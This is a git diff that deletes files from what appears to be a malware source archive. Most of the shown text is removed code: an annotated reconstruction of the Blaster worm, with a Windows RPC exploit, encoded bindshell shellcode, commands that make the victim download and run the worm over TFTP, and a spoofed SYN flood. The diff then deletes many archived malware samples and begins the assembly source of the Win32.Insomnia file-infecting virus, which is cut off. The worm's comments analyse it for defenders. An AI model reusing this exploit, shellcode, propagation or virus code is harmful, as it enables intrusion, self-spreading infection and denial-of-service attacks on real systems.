-,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 - -,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 - -,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 - -,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00}; - -unsigned char request2[]={ -0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 -,0x00,0x00,0x5C,0x00,0x5C,0x00}; - -unsigned char request3[]={ -0x5C,0x00 -,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 - -,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 - 
-,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 - -,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; - - -unsigned char sc[]= -"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" -"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" -"\x46\x00\x58\x00\x46\x00\x58\x00" - -"\xff\xff\xff\xff" /* return address */ - -"\xcc\xe0\xfd\x7f" /* primary thread data block */ -"\xcc\xe0\xfd\x7f" /* primary thread data block */ - -/* port 4444 bindshell */ -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" -"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" -"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" -"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" -"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" -"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" -"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" -"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" -"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" -"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" -"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" -"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" 
-"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" -"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" -"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" -"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" -"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" -"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" -"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" -"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" -"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" -"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" -"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" -"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" -"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" -"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" -"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" -"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" -"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" -"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" -"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" -"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; - - - -unsigned char request4[]={ -0x01,0x10 -,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 - -,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C - -,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 -}; - -int ThreadId; -int len; -int sizeof_sa; -int ret; -int opt; -void *hThread; -struct sockaddr_in target_ip; -struct sockaddr_in sa; -int fd; -char cmdstr[0x200]; -int len1; -unsigned char buf2[0x1000]; -int i; - -/* -* Turn off non-blocking (i.e. re-enable blocking mode) -* DEFENSE: Tarpit programs (e.g. 
'labrea' or 'deredoc') -* will slow down the spread of this worm. It takes a long -* time for blocking calls to timeout. I had several -* thousand worms halted by my 'deredoc' tarpit. -*/ -opt = 0; -ioctlsocket(sock, FIONBIO , &opt); - -/* -* Choose whether the exploit targets Win2k or WinXP. -*/ -if (winxp1_or_win2k2 == 1) -ret = 0x100139d; -else -ret = 0x18759f; -memcpy(sc+36, (unsigned char *) &ret, 4); - -/* ---------------------------------------------- -* This section is just copied from the original exploit -* script. This is the same as the scripts that have been -* widely published on the Internet. */ -len=sizeof(sc); -memcpy(buf2,request1,sizeof(request1)); -len1=sizeof(request1); - -*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; -*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; - -memcpy(buf2+len1,request2,sizeof(request2)); -len1=len1+sizeof(request2); -memcpy(buf2+len1,sc,sizeof(sc)); -len1=len1+sizeof(sc); -memcpy(buf2+len1,request3,sizeof(request3)); -len1=len1+sizeof(request3); -memcpy(buf2+len1,request4,sizeof(request4)); -len1=len1+sizeof(request4); - -*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; - - -*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; - -if (send(sock,bindstr,sizeof(bindstr),0)== -1) -{ -//perror("- Send"); -return; -} - - -if (send(sock,buf2,len1,0)== -1) -{ -//perror("- Send"); -return; -} -closesocket(sock); -Sleep(400); -/* ----------------------------------------------*/ 
- - -/* -* This section of code connects to the victim on port 4444. -* DEFENSE : This means you can block this worm by blocking -* TCP port 4444. -* FAQ: This port is only open for the brief instant needed -* to exploit the victim. Therefore, you can't scan for -* port 4444 in order to find Blaster victims. -*/ -if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1) -return; -memset(&target_ip, 0, sizeof(target_ip)); -target_ip.sin_family = AF_INET; -target_ip.sin_port = htons(SHELL_PORT_4444); -target_ip.sin_addr.s_addr = inet_addr(victim_ip); -if (target_ip.sin_addr.s_addr == SOCKET_ERROR) -return; -if (connect(fd, (struct sockaddr*)&target_ip, -sizeof(target_ip)) == SOCKET_ERROR) -return; - -/* -* This section recreates the IP address from whatever IP -* address this successfully connected to. In practice, -* the strings "victim_ip" and "target_ip_string" should be -* the same. -*/ -memset(target_ip_string, 0, sizeof(target_ip_string)); -sizeof_sa = sizeof(sa); -getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa); -sprintf(target_ip_string, "%d.%d.%d.%d", -sa.sin_addr.s_net, sa.sin_addr.s_host, -sa.sin_addr.s_lh, sa.sin_addr.s_impno); - -/* -* This section creates a temporary TFTP service that is -* ONLY alive during the period of time that the victim -* needs to download. -* FAQ: You can't scan for TFTP in order to find Blaster -* victims because the port is rarely open. -*/ -if (fd_tftp_service) -closesocket(fd_tftp_service); -hThread = CreateThread(0,0, -blaster_tftp_thread,0,0,&ThreadId); -Sleep(80); /*give time for thread to start*/ - -/* -* This sends the command -* tftp -i 1.2.3.4 GET msblast.exe -* to the victim. The "tftp.exe" program is built into -* Windows. It's intended purpose is to allow users to -* manually update their home wireless access points with -* new software (and other similar tasks). However, it is -* not intended as a generic file-transfer protocol (it -* stands for "trivial-file-transfer-protocol" -- it is -* intended for only trivial tasks). 
Since a lot of hacker -* exploits use the "tftp.exe" program, a good hardening -* step is to remove/rename it. -*/ -sprintf(cmdstr, "tftp -i %s GET %s\n", -target_ip_string, MSBLAST_EXE); -if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0) -goto closesocket_and_return; - -/* -* Wait 21 seconds for the victim to request the file, then -* for the file to be delivered via TFTP. -*/ -Sleep(1000); -for (i=0; i<10 && is_tftp_running; i++) -Sleep(2000); - -/* -* Assume the the transfer is successful, and send the -* command to start executing the newly downloaded program. -* BUFORD: The hacker starts this twice. Again, it -* demonstrates a lock of confidence, so he makes sure it's -* started by doing it twice in slightly different ways. -* Note that the "BILLY" mutex will prevent from actually -* running twice. -*/ -sprintf(cmdstr, "start %s\n", MSBLAST_EXE); -if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0) -goto closesocket_and_return; -Sleep(2000); -sprintf(cmdstr, "%s\n", MSBLAST_EXE); -send(fd, cmdstr, strlen(cmdstr), 0); -Sleep(2000); - - -/* -* This section closes the things started in this procedure -*/ -closesocket_and_return: - -/* Close the socket for the remote command-prompt that has -* been established to the victim. */ -if (fd != 0) -closesocket(fd); - -/* Close the TFTP server that was launched above. As noted, -* this means that the TFTP service is not running most of -* the time, so it's not easy to scan for infected systems. -*/ -if (is_tftp_running) { -TerminateThread(hThread,0); -closesocket(fd_tftp_service); -is_tftp_running = 0; -} -CloseHandle(hThread); -} - - -/** -* Convert the name into an IP address. If the IP address -* is formatted in decimal-dot-notation (e.g. 192.2.0.43), -* then return that IP address, otherwise do a DNS lookup -* on the address. 
Note that in the case of the worm, -* it always gives the string "windowsupdate.com" to this -* function, and since Microsoft turned off that name, -* the DNS lookup will usually fail, so this function -* generally returns -1 (SOCKET_ERROR), which means the -* address 255.255.255.255. -*/ -int blaster_resolve_ip(const char *windowsupdate_com) -{ -int result; - -result = inet_addr(windowsupdate_com); -if (result == SOCKET_ERROR) { -HOSTENT *p_hostent = gethostbyname(windowsupdate_com); -if (p_hostent == NULL) -result = SOCKET_ERROR; -else -result = *p_hostent->h_addr; -} - -return result; -} - - -/* -* This thre -*/ -ULONG WINAPI blaster_DoS_thread(LPVOID p) -{ -int opt = 1; -int fd; -int target_ip; - - -/* Lookup the domain-name. Note that no checking is done -* to ensure that the name is valid. Since Microsoft turned -* this off in their domain-name servers, this function now -* returns -1. */ -target_ip = blaster_resolve_ip("windowsupdate.com"); - - -/* Create a socket that the worm will blast packets at -* Microsoft from. This is what is known as a "raw" socket. -* So-called "raw-sockets" are ones where packets are -* custom-built by the programmer rather than by the TCP/IP -* stack. Note that raw-sockets were not available in Windows -* until Win2k. A cybersecurity pundit called Microsoft -* "irresponsible" for adding them. -* -* That's probably an -* unfairly harsh judgement (such sockets are available in -* every other OS), but it's true that it puts the power of -* SYNflood attacks in the hands of lame worm writers. While -* the worm-writer would probably have chosen a different -* DoS, such as Slammer-style UDP floods, it's likely that -* Buford wouldn't have been able to create a SYNflood if -* raw-sockets had not been added to Win2k/WinXP. 
*/ -fd = WSASocket( -AF_INET, /*TCP/IP sockets*/ -SOCK_RAW, /*Custom TCP/IP headers*/ -IPPROTO_RAW, -NULL, -0, -WSA_FLAG_OVERLAPPED -); -if (fd == SOCKET_ERROR) -return 0; - -/* Tell the raw-socket that IP headers will be created by the -* programmer rather than the stack. Most raw sockets in -* Windows will also have this option set. */ -if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, -(char*)&opt, sizeof(opt)) == SOCKET_ERROR) -return 0; - - -/* Now do the SYN flood. The worm writer decided to flood -* slowly by putting a 20-millisecond delay between packets -* -- causing only 500 packets/second, or roughly, 200-kbps. -* There are a couple of reasons why the hacker may have -* chosen this. -* 1. SYNfloods are not intended to be bandwidth floods, -* even slow rates are hard to deal with. -* 2. Slammer DoSed both the sender and receiver, therefore -* senders hunted down infected systems and removed -* them. This won't DoS the sender, so people are more -* likely not to care about a few infected machines. -*/ -for (;;) { -blaster_send_syn_packet(target_ip, fd); - -/* Q: How fast does it send the SYNflood? -* A: About 50 packets/second, where each packet is -* 320-bits in size, for a total of 15-kbps. -* It means that Buford probably intended for -* dialup users to be a big source of the DoS -* attack. He was smart enough to realize that -* faster floods would lead to users discovering -* the worm and turning it off. */ -Sleep(20); -} - - -closesocket(fd); -return 0; -} - - - -/* -* This is a standard TCP/IP checksum algorithm -* that you find all over the web. 
-*/ -int blaster_checksum(const void *bufv, int length) -{ -const unsigned short *buf = (const unsigned short *)bufv; -unsigned long result = 0; - -while (length > 1) { -result += *(buf++); -length -= sizeof(*buf); -} -if (length) result += *(unsigned char*)buf; -result = (result >> 16) + (result & 0xFFFF); -result += (result >> 16); -result = (~result)&0xFFFF; - -return (int)result; -} - - - -/* -* This is a function that uses "raw-sockets" in order to send -* a SYNflood at the victim, which is "windowsupdate.com" in -* the case of the Blaster worm. -*/ -void blaster_send_syn_packet(int target_ip, int fd) -{ - -struct IPHDR -{ -unsigned char verlen; /*IP version & length */ -unsigned char tos; /*IP type of service*/ -unsigned short totallength;/*Total length*/ -unsigned short id; /*Unique identifier */ -unsigned short offset; /*Fragment offset field*/ -unsigned char ttl; /*Time to live*/ -unsigned char protocol; /*Protocol(TCP, UDP, etc.)*/ -unsigned short checksum; /*IP checksum*/ -unsigned int srcaddr; /*Source address*/ -unsigned int dstaddr; /*Destination address*/ - -}; -struct TCPHDR -{ -unsigned short srcport; -unsigned short dstport; -unsigned int seqno; -unsigned int ackno; -unsigned char offset; -unsigned char flags; -unsigned short window; -unsigned short checksum; -unsigned short urgptr; -}; -struct PSEUDO -{ -unsigned int srcaddr; -unsigned int dstaddr; -unsigned char padzero; -unsigned char protocol; -unsigned short tcplength; -}; -struct PSEUDOTCP -{ -unsigned int srcaddr; -unsigned int dstaddr; -unsigned char padzero; -unsigned char protocol; -unsigned short tcplength; -struct TCPHDR tcphdr; -}; - - - - -char spoofed_src_ip[16]; -unsigned short target_port = 80; /*SYNflood web servers*/ -struct sockaddr_in to; -struct PSEUDO pseudo; -char buf[60] = {0}; -struct TCPHDR tcp; -struct IPHDR ip; -int source_ip; - - -/* Yet another randomizer-seeding */ -srand(GetTickCount()); - -/* Generate a spoofed source address that is local to the -* current Class 
B subnet. This is pretty smart of Buford. -* Using just a single IP address allows defenders to turn -* it off on the firewall, whereas choosing a completely -* random IP address would get blocked by egress filters -* (because the source IP would not be in the proper range). -* Randomly choosing nearby IP addresses it probably the -* best way to evade defenses */ -sprintf(spoofed_src_ip, "%i.%i.%i.%i", -local_class_a, local_class_b, rand()%255, rand()%255); -source_ip = blaster_resolve_ip(spoofed_src_ip); - -/* Build the sockaddr_in structure. Normally, this is what -* the underlying TCP/IP stack uses to build the headers -* from. However, since the DoS attack creates its own -* headers, this step is largely redundent. */ -to.sin_family = AF_INET; -to.sin_port = htons(target_port); /*this makes no sense */ -to.sin_addr.s_addr = target_ip; - -/* Create the IP header */ -ip.verlen = 0x45; -ip.totallength = htons(sizeof(ip) + sizeof(tcp)); -ip.id = 1; -ip.offset = 0; -ip.ttl = 128; -ip.protocol = IPPROTO_TCP; -ip.checksum = 0; /*for now, set to true value below */ -ip.dstaddr = target_ip; - -/* Create the TCP header */ -tcp.dstport = htons(target_port); -tcp.ackno = 0; -tcp.offset = (unsigned char)(sizeof(tcp)<<4); -tcp.flags = 2; /*TCP_SYN*/ -tcp.window = htons(0x4000); -tcp.urgptr = 0; -tcp.checksum = 0; /*for now, set to true value below */ - -/* Create pseudo header (which copies portions of the IP -* header for TCP checksum calculation).*/ -pseudo.dstaddr = ip.dstaddr; -pseudo.padzero = 0; -pseudo.protocol = IPPROTO_TCP; -pseudo.tcplength = htons(sizeof(tcp)); - -/* Use the source adress chosen above that is close, but -* not the same, as the spreader's IP address */ -ip.srcaddr = source_ip; - -/* Choose a random source port in the range [1000-19999].*/ -tcp.srcport = htons((unsigned short)((rand()%1000)+1000)); - -/* Choose a random sequence number to start the connection. 
-* BUG: Buford meant htonl(), not htons(), which means seqno -* will be 15-bits, not 32-bits, i.e. in the range -* [0-32767]. (the Windows rand() function only returns -* 15-bits). */ -tcp.seqno = htons((unsigned short)((rand()<<16)|rand())); - -pseudo.srcaddr = source_ip; - -/* Calculate TCP checksum */ -memcpy(buf, &pseudo, sizeof(pseudo)); -memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp)); -tcp.checksum = blaster_checksum(buf, -sizeof(pseudo)+sizeof(tcp)); - -memcpy(buf, &ip, sizeof(ip)); -memcpy(buf+sizeof(ip), &tcp, sizeof(tcp)); - -/* I have no idea what's going on here. The assembly code -* zeroes out a bit of memory near the buffer. I don't know -* if it is trying to zero out a real variable that happens -* to be at the end of the buffer, or if it is trying to zero -* out part of the buffer itself. */ -memset(buf+sizeof(ip)+sizeof(tcp), 0, -sizeof(buf)-sizeof(ip)-sizeof(tcp)); - -/* Major bug here: the worm writer incorrectly calculates the -* IP checksum over the entire packet. This is incorrect -- -* the IP checksum is just for the IP header itself, not for -* the TCP header or data. However, Windows fixes the checksum -* anyway, so the bug doesn't appear in the actual packets -* themselves. -*/ -ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp)); - -/* Copy the header over again. The reason for this is simply to -* copy over the checksum that was just calculated above, but -* it's easier doing this for the programmer rather than -* figuring out the exact offset where the checksum is -* located */ -memcpy(buf, &ip, sizeof(ip)); - -/* Send the packet */ -sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0, -(struct sockaddr*)&to, sizeof(to)); -} \ No newline at end of file diff --git a/Win32/Win32.Capric.7z b/Win32/Win32.Capric.7z deleted file mode 100644 index e9fd1ea8..00000000 Binary files a/Win32/Win32.Capric.7z and /dev/null differ 
diff --git a/Win32/Win32.Cyber.b.7z b/Win32/Win32.Cyber.b.7z deleted file mode 100644 index 23787c17..00000000 Binary files a/Win32/Win32.Cyber.b.7z and /dev/null differ diff --git a/Win32/Win32.D.a.7z b/Win32/Win32.D.a.7z deleted file mode 100644 index 89ec7647..00000000 Binary files a/Win32/Win32.D.a.7z and /dev/null differ diff --git a/Win32/Win32.D.b.7z b/Win32/Win32.D.b.7z deleted file mode 100644 index a0d49942..00000000 Binary files a/Win32/Win32.D.b.7z and /dev/null differ diff --git a/Win32/Win32.DarkAnal.7z b/Win32/Win32.DarkAnal.7z deleted file mode 100644 index c69e7aa5..00000000 Binary files a/Win32/Win32.DarkAnal.7z and /dev/null differ diff --git a/Win32/Win32.Darkness.a.7z b/Win32/Win32.Darkness.a.7z deleted file mode 100644 index 0aa275ba..00000000 Binary files a/Win32/Win32.Darkness.a.7z and /dev/null differ diff --git a/Win32/Win32.Darkness.b.7z b/Win32/Win32.Darkness.b.7z deleted file mode 100644 index bae9123d..00000000 Binary files a/Win32/Win32.Darkness.b.7z and /dev/null differ diff --git a/Win32/Win32.Delikon.7z b/Win32/Win32.Delikon.7z deleted file mode 100644 index 7ce35ebb..00000000 Binary files a/Win32/Win32.Delikon.7z and /dev/null differ diff --git a/Win32/Win32.EnglishRat.7z b/Win32/Win32.EnglishRat.7z deleted file mode 100644 index 5896159c..00000000 Binary files a/Win32/Win32.EnglishRat.7z and /dev/null differ diff --git a/Win32/Win32.Eris.7z b/Win32/Win32.Eris.7z deleted file mode 100644 index fead3e5f..00000000 Binary files a/Win32/Win32.Eris.7z and /dev/null differ diff --git a/Win32/Win32.Flexispy.7z b/Win32/Win32.Flexispy.7z deleted file mode 100644 index b71b54b5..00000000 Binary files a/Win32/Win32.Flexispy.7z and /dev/null differ diff --git a/Win32/Win32.ForBot.7z b/Win32/Win32.ForBot.7z deleted file mode 100644 index 51dfe693..00000000 Binary files a/Win32/Win32.ForBot.7z and /dev/null differ 
diff --git a/Win32/Win32.FukJ.7z b/Win32/Win32.FukJ.7z deleted file mode 100644 index 6552e294..00000000 Binary files a/Win32/Win32.FukJ.7z and /dev/null differ diff --git a/Win32/Win32.Fungus.7z b/Win32/Win32.Fungus.7z deleted file mode 100644 index d4086ab7..00000000 Binary files a/Win32/Win32.Fungus.7z and /dev/null differ diff --git a/Win32/Win32.Gaelicum.A.7z b/Win32/Win32.Gaelicum.A.7z deleted file mode 100644 index 77f8109a..00000000 Binary files a/Win32/Win32.Gaelicum.A.7z and /dev/null differ diff --git a/Win32/Win32.Gold.7z b/Win32/Win32.Gold.7z deleted file mode 100644 index 09b92bef..00000000 Binary files a/Win32/Win32.Gold.7z and /dev/null differ diff --git a/Win32/Win32.Grum.7z b/Win32/Win32.Grum.7z deleted file mode 100644 index f424197b..00000000 Binary files a/Win32/Win32.Grum.7z and /dev/null differ diff --git a/Win32/Win32.Gypsy.7z b/Win32/Win32.Gypsy.7z deleted file mode 100644 index 6bddcc3a..00000000 Binary files a/Win32/Win32.Gypsy.7z and /dev/null differ diff --git a/Win32/Win32.H.7z b/Win32/Win32.H.7z deleted file mode 100644 index 3bfec83b..00000000 Binary files a/Win32/Win32.H.7z and /dev/null differ diff --git a/Win32/Win32.Hell.7z b/Win32/Win32.Hell.7z deleted file mode 100644 index 36ee4d77..00000000 Binary files a/Win32/Win32.Hell.7z and /dev/null differ diff --git a/Win32/Win32.Hellbot.c.7z b/Win32/Win32.Hellbot.c.7z deleted file mode 100644 index 9ab9e5f9..00000000 Binary files a/Win32/Win32.Hellbot.c.7z and /dev/null differ diff --git a/Win32/Win32.Hidden.7z b/Win32/Win32.Hidden.7z deleted file mode 100644 index 7a04540e..00000000 Binary files a/Win32/Win32.Hidden.7z and /dev/null differ diff --git a/Win32/Win32.Hydra.7z b/Win32/Win32.Hydra.7z deleted file mode 100644 index 7313dbf4..00000000 Binary files a/Win32/Win32.Hydra.7z and /dev/null differ diff --git a/Win32/Win32.IMBot.7z b/Win32/Win32.IMBot.7z deleted file mode 100644 index e2b608f7..00000000 Binary files a/Win32/Win32.IMBot.7z and /dev/null differ 
diff --git a/Win32/Win32.Infest.7z b/Win32/Win32.Infest.7z deleted file mode 100644 index a61120b6..00000000 Binary files a/Win32/Win32.Infest.7z and /dev/null differ diff --git a/Win32/Win32.Insomnia.txt b/Win32/Win32.Insomnia.txt deleted file mode 100644 index ca111466..00000000 --- a/Win32/Win32.Insomnia.txt +++ /dev/null 
@@ -1,468 +0,0 @@ -; Win32.Insomnia (c) DR-EF. -;-------------------------------------------------- -;virus name:Win32.Insomnia -;virus author:DR-EF -;virus size:1972 bytes -;features: -; o dont increase file size,overwrite reloc -; section instead. -; o use EPO - replace all mov eax,fs:[00000000] -; instructions with call virus decryptor. -; o encrypted with new key for each file. -; o use the dotdot method to find files. -;payload:messagebox with this text: -; ".:[Win32.Insomnia � 2004 DR-EF]:." -; every year at 29/12. -;compile: -; tasm32 /m3 /ml /zi Insomnia.asm , , ; -; tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib -; pewrsec Insomnia.exe -;-------------------------------------------------- - -.386 -.model flat - - extrn ExitProcess:proc - - virus_size equ (EndVirus-virus_start) - INVALID_HANDLE_VALUE equ -1 - FILE_ATTRIBUTE_NORMAL equ 00000080h - OPEN_EXISTING equ 3 - GENERIC_WRITE equ 40000000h - GENERIC_READ equ 80000000h - PAGE_READWRITE equ 4h - FILE_MAP_WRITE equ 00000002h - -.data - db ? 
-.code - -virus_start: - call Delta -Delta: pop ebp - sub ebp,offset Delta - mov ecx,NumberOfKernelBases - lea esi,[ebp + KernelBaseTable] -@next_k:lodsd - call GetKernel32Base - jc GetApis - loop @next_k - jmp reth ;return to host -KernelBaseTable: - dd 804d4000h ;winXP - dd 0bff60000h ;winME - dd 77f00000h ;winNT - dd 77e70000h ;win2K - dd 0bff70000h ;win9X - NumberOfKernelBases equ 5h - -GetApis:mov eax,[ebp + kernel32base] - add eax,[eax + 3ch] - mov eax,[eax + 78h] - add eax,[ebp + kernel32base] - ;eax - kernel32 export table - push eax - xor edx,edx - mov eax,[eax + 20h] - add eax,[ebp + kernel32base] - mov edi,[eax] - add edi,[ebp + kernel32base] - ;edi - api names array - dec edi -nxt_cmp:inc edi - lea esi,[ebp + _GetProcAddress] - mov ecx,0eh - rep cmpsb - je search_address - inc edx -nxt_l: cmp byte ptr [edi],0h - je nxt_cmp - inc edi - jmp nxt_l -search_address: - pop eax - ;eax - kernel32 export table - ;edx - GetProcAddress position - shl edx,1h - mov ebx,[eax + 24h] - add ebx,[ebp + kernel32base] - add ebx,edx - mov dx,word ptr [ebx] - shl edx,2h - mov ebx,[eax + 1ch] - add ebx,[ebp + kernel32base] - add ebx,edx - mov ebx,[ebx] - add ebx,[ebp + kernel32base] - mov [ebp + GetProcAddress],ebx - mov ecx,NumberOfApis - lea eax,[ebp + ApiNamesTable] - lea ebx,[ebp + ApiAddressTable] -nxt_api:push ecx - push eax - push eax - push [ebp + kernel32base] - call [ebp + GetProcAddress] - or eax,eax - je api_err - mov dword ptr [ebx],eax - pop eax -nxt_al: inc eax - cmp byte ptr [eax],0h - jne nxt_al - inc eax - add ebx,4h - pop ecx - loop nxt_api - jmp InfectFiles -api_err:add esp,8h - jmp reth - - _GetProcAddress db "GetProcAddress",0 - GetProcAddress dd 0 - kernel32base dd 0 - -ApiNamesTable: - _FindFirstFile db "FindFirstFileA",0 - _FindNextFile db "FindNextFileA",0 - _GetCurrentDirectory db "GetCurrentDirectoryA",0 - _SetCurrentDirectory db "SetCurrentDirectoryA",0 - _CreateFile db "CreateFileA",0 - _CloseHandle db "CloseHandle",0 - _CreateFileMapping db 
